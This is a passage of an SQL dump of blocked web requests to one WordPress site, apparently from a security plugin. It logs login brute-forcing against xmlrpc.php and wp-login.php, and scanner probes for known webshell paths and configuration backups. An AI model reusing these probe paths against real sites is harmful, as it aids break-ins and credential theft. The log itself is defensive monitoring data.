Safari\\/537.36\"}','TicsoKUEdvbAhfLNm0Yw481p',0,1665552926.8708,17649,'','POST',403,0,600,0,1,'',0),('72.34.62.119',1210203767,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wTLRzsC0iSPKJMVWXajkQ1BG',0,1665553027.7991,15642,'','POST',403,0,515,0,1,'',0),('91.201.215.19',1539954451,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','nIoKvY8JkC0l7uyLZDjMPU62',0,1665552606.3270,2729,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MBFVH2of5zdSnrGbha3iuR8x',0,1665552074.2389,18654,'','POST',403,0,515,0,1,'',0),('81.88.52.134',1364735110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','wNSjl4qkJpPgbU0ZLudKIE19',0,1665551435.4705,18706,'','POST',403,0,515,0,1,'',0),('45.61.187.99',759020387,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','Qx6b5npvwT1ViWFdjCzN89Hg',0,1665551812.3243,1214,'','POST',403,0,600,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Pw1asVxkK7GAHShDyYjLFi2t',0,1665551116.7380,400,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/uploads/wp-queryall.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','bNsqUZWk4gK5BPjhGax92HdF',0,1665551115.1527,335,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/themes/twentythree/inc/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','f8geC7xikYvN9yor3LTQaXcZ',0,1665551112.9473,327,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/wordpress-index-keyword.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Xfs6ak1Ty2QLgSApmZWbMRVh',0,1665551108.4970,343,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/class-detect-spam.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5e1QqJi4xsWrnfECRv8MgIUG',0,1665551110.6723,328,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/plugins/seoplugins/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','IYF9RGxreNp6Hbh25iqyw8Bm',0,1665551106.3414,320,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lvAp61XRjTxh4nmNqyGDtszY',0,1665551104.1236,418,'','GET',403,0,700,0,1,'',0),('54.38.33.178',908468658,'','https://cteisys.com/wp-content/plugins/core-engine/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','lVIvXzr4ZdsL7DHTqE0cwaeU',0,1665551101.7583,326,'','GET',403,0,700,0,1,'',0),('46.101.150.34',778409506,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','VW0CRq1djBmcQZf5KpGt6FLi',0,1665551054.6773,17906,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','JXkf0BAH8rRIyp5ohvGmNqa2',0,1665557890.6375,17497,'','POST',403,0,600,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FQJe46I8DhYpNWOmnjigvo95',0,1665557681.9767,18553,'','POST',403,0,515,0,1,'',0),('167.172.105.95',2813094239,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','mnfV69DQb0shd3pGHPXEKWU1',0,1665557210.6924,17889,'','POST',403,0,600,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ACglpPbfnkyUSmXHiNDYqaOw',0,1665557039.4939,2458,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','Sm9NitoWFLBXgT7bfKUERkh4',0,1665556771.1640,12889,'','POST',403,0,600,0,1,'',0),('192.99.34.140',3227722380,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HxWD9dOMRA5ZyU2qB3CNiwoF',0,1665556682.7209,19225,'','POST',403,0,515,0,1,'',0),('139.59.6.209',2335901393,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','e51kzKIud3AD4oafpBHWbLPY',0,1665556302.6096,20650,'','POST',403,0,515,0,1,'',0),('35.193.197.89',599901529,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bk7GViNcfTHWPMqClXA1noZO',0,1665555146.1817,19080,'','POST',403,0,515,0,1,'',0),('35.195.135.67',600016707,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7cEkm0ObTW8VvQqFix6UgaYl',0,1665555939.5712,19022,'','POST',403,0,515,0,1,'',0),('188.166.225.235',3165053419,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','n09phzrqcmRoHKJLaVEx7FTy',0,1665554898.9600,17912,'','POST',403,0,600,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pDewtuaNc1EbQGkO2md4C0TY',0,1665554724.4288,18773,'','POST',403,0,515,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JrpIBhb9oa54F2kG1PTCVQYc',0,1665561088.4335,1541,'','POST',403,0,515,0,1,'',0),('188.164.193.195',3164914115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','q8C7NBbPYQZl9OscK1Lw0yTg',0,1665561491.6846,2430,'','POST',403,0,515,0,1,'',0),('165.232.190.217',2783493849,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uVLaMB9XFwp1DmxY8T2kfR64',0,1665560724.0843,2482,'','POST',403,0,515,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','37tB6Nf8cvOCeHR4pXsk0gxL',0,1665560938.1163,1403,'','POST',403,0,600,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','3h4CrsKRbfM5B8q19ZokSI6L',0,1665560508.6304,8094,'','POST',403,0,600,0,1,'',0),('128.199.21.138',2160530826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YAqQ4WNLaDtdukOpFPVxBgJ5',0,1665560006.5712,9127,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gaRZl57bTto2Be0SzrWAxLXy',0,1665559691.4371,2182,'','POST',403,0,515,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eMrGXT9t4yKsQZROBnuCH5ac',0,1665559308.0209,12695,'','POST',403,0,515,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qmpsix8YdzwSNQ2PchT3VFbI',0,1665559020.2812,19549,'','POST',403,0,515,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MNrPmDKLlSJEiC1gVcke0vxT',0,1665558337.5494,1429,'','POST',403,0,515,0,1,'',0),('68.235.48.108',1156264044,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','iFmxEtMSCUdHWZPDnfQbR6Bc',0,1665558247.4928,18231,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GB420Q3vCd6YImpyfX8hZtWV',0,1665558021.1894,3661,'','POST',403,0,515,0,1,'',0),('184.75.221.43',3091979563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','xbRh98BDu1TzO6qaCk5Sv4Z0',0,1665597562.5803,18510,'','POST',403,0,515,0,1,'',0),('173.236.176.107',2917970027,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','6pfnbXo3O7humxlsZ9dY1Eqj',0,1665597380.0245,18192,'','POST',403,0,600,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','lw7UWZQsTtv5nbgkA8hOzxef',0,1665596103.0099,17666,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','HfCSzBun7s82PJmEhaAwYrIt',0,1665594810.5420,1246,'','POST',403,0,600,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZsRvt7W2m9LCOfMVBTFK3QNJ',0,1665565083.7253,18206,'','POST',403,0,515,0,1,'',0),('62.102.148.156',1046910108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','y6lOVuUEvcir3mdpxjBfKJRw',0,1665564583.9311,18691,'','POST',403,0,515,0,1,'',0),('165.232.190.217',2783493849,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','92q7ZBgiUSJVl8vRGIeTDosa',0,1665564659.1081,4480,'','POST',403,0,515,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','z8po5wTcPbC94NklIBEfQsWm',0,1665564284.7734,676,'','POST',403,0,600,0,1,'',0),('118.98.64.188',1986150588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1Ahwzn2ZlUGNt5Hdsq0FE4xR',0,1665563834.1627,18702,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xmvJc7ketbjUHsDdTi1I0qEw',0,1665563448.4653,19588,'','POST',403,0,515,0,1,'',0),('157.0.140.186',2634058938,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','C6XGcoFORrJiYKugUaysthBW',0,1665562649.7562,2722,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qlWh5rmCV4yDS6ocJQAXNTY9',0,1665563024.5385,2394,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','FD9KGuUO0AZojvzXxlhf6gbR',0,1665562420.7604,17595,'','POST',403,0,600,0,1,'',0),('80.251.219.111',1358682991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HrjLPwscuaxl3KBRUYTACfqv',0,1665561872.0978,5071,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','LYbDq0Nm6WShkMZuzwOU75g4',0,1665561609.5099,507,'','POST',403,0,600,0,1,'',0),('213.152.186.163',3583556259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5USMhuzndWeGcJmrf0Eb138A',0,1665594652.2155,2294,'','POST',403,0,515,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3M51rWKe4iZJ2kGwBTvxUNLm',0,1665594626.3405,274,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','p7RU5rohZclysjBJm3tWQMX1',0,1665594623.1542,285,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RbOY4mnW0GkVxEQIvL27lo3T',0,1665594621.8912,341,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5uY78igOzn9k1l4AbCLK6J3T',0,1665594618.5824,288,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','zVrWkLGKi0B2HaucIZXRxjwq',0,1665594617.1532,306,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','j2mEUysg71SYfC8GRxc0XADl',0,1665594615.4988,296,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sCnNKefiFvU8x9QdkMcHjR7o',0,1665594609.5131,332,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sHgZWT05UFb8hjmQES3GBfqR',0,1665594605.6891,322,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','VIQvpusGE7NbkAZRlXD5JUda',0,1665594599.1265,273,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rPGntElDyRsz2Sm0fV7pkFTQ',0,1665594595.2838,294,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Qaiu7BSLeTwUMj8l6W0X1HAp',0,1665594592.9778,301,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9q57ndJ64FIZ3PEc2gDekvQO',0,1665594591.2284,290,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GnzIcC2StXTH9L1mNYoFav7V',0,1665594590.1523,311,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','p4SdbJWf1n8ol7syj5mZxMYX',0,1665594589.0423,296,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','InWDa6B3dsOeAqHio4jChKzb',0,1665594586.3638,301,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','https://cteisys.com/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Rj8HqEy4rdDYzJihxO9MN2A1',0,1665594584.9965,299,'','POST',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lQ2ZMCLWcykIfNn4g8isrVGb',0,1665594581.5030,293,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','J5tXnAawkvWFIjxSYgGr1L0H',0,1665594578.8433,287,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yzdDrBGC7AlEWJiL8VvXR3aZ',0,1665594577.3892,295,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','8vCtQjL3Ghm2FaxdPz64SwkA',0,1665594573.6575,286,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LqolO4W5nH3c6vwBJYNk9xEy',0,1665594568.9014,276,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gt7DXOKBkrhdaAbiJ38VGWHL',0,1665594566.4106,294,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cn2aF96OTWjHdZ5PlMvLAVSr',0,1665594565.2285,292,'','GET',403,0,700,0,1,'',0),('159.203.120.246',2680912118,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','JZp3BxYtduXbRWrK4j8w92cO',0,1665585610.6109,6803,'','POST',403,0,600,0,1,'',0),('213.152.161.101',3583549797,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','yq3iD7sv5VxREArnOP4oWTB0',0,1665585171.9617,19420,'','POST',403,0,515,0,1,'',0),('184.75.223.203',3091980235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','B1jCGLI93gZkRWQn0pvATDOl',0,1665584378.6521,2271,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Hmj6dC5kDiGUqLP9Y2IwbThA',0,1665582443.6096,478,'','POST',403,0,600,0,1,'',0),('91.207.57.115',1540307315,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FAQjtJwPheuv80qlb5VKzBTX',0,1665581926.6113,2499,'','POST',403,0,515,0,1,'',0),('146.59.243.31',2453402399,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','isGZkcloHhr5q2SeEXj7LBAd',0,1665579553.6489,327,'','GET',403,0,700,0,1,'',0),('146.59.243.31',2453402399,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 